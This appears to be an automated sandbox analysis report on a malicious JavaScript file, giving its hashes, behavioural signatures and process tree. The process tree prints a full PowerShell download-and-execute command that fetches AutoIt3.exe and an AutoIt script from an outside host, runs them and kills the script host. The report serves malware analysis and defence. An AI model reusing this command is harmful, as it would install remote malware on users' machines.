Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
09-11-2023 01:43
Static task
static1
Behavioral task
behavioral1
Sample
eccf555cc4f3293e850fc35377a06d69f04b81192f3f27b645bc4cfb23fc085d.js
Resource
win7-20231025-en
Behavioral task
behavioral2
Sample
eccf555cc4f3293e850fc35377a06d69f04b81192f3f27b645bc4cfb23fc085d.js
Resource
win10v2004-20231023-en
General
-
Target
eccf555cc4f3293e850fc35377a06d69f04b81192f3f27b645bc4cfb23fc085d.js
-
Size
252KB
-
MD5
5780dea262044531b19f3194408aad91
-
SHA1
a2579952eedec5ec649f589c1e797c91a05eaf93
-
SHA256
eccf555cc4f3293e850fc35377a06d69f04b81192f3f27b645bc4cfb23fc085d
-
SHA512
e45f5351921016ff87e6d81cc1eaade7c88324f847ec37dd60d08bc4830ebe6fb6b00f9623d3438d03c48236f091fff19f239face730ddfa2c9ea6640adc55c3
-
SSDEEP
6144:Ye7hgXeerjqlI2Iro+/e7hgXeerjqlI2Iro+8:YIhgSlI234IhgSlI23V
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2584 powershell.exe 2584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2584 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2096 wrote to memory of 2584 2096 wscript.exe 28 PID 2096 wrote to memory of 2584 2096 wscript.exe 28 PID 2096 wrote to memory of 2584 2096 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\eccf555cc4f3293e850fc35377a06d69f04b81192f3f27b645bc4cfb23fc085d.js1⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://8sjimonstersboonkonline.com:2351/msiqgmovrcg' -OutFile 'qgmovrcg.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'qgmovrcg.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-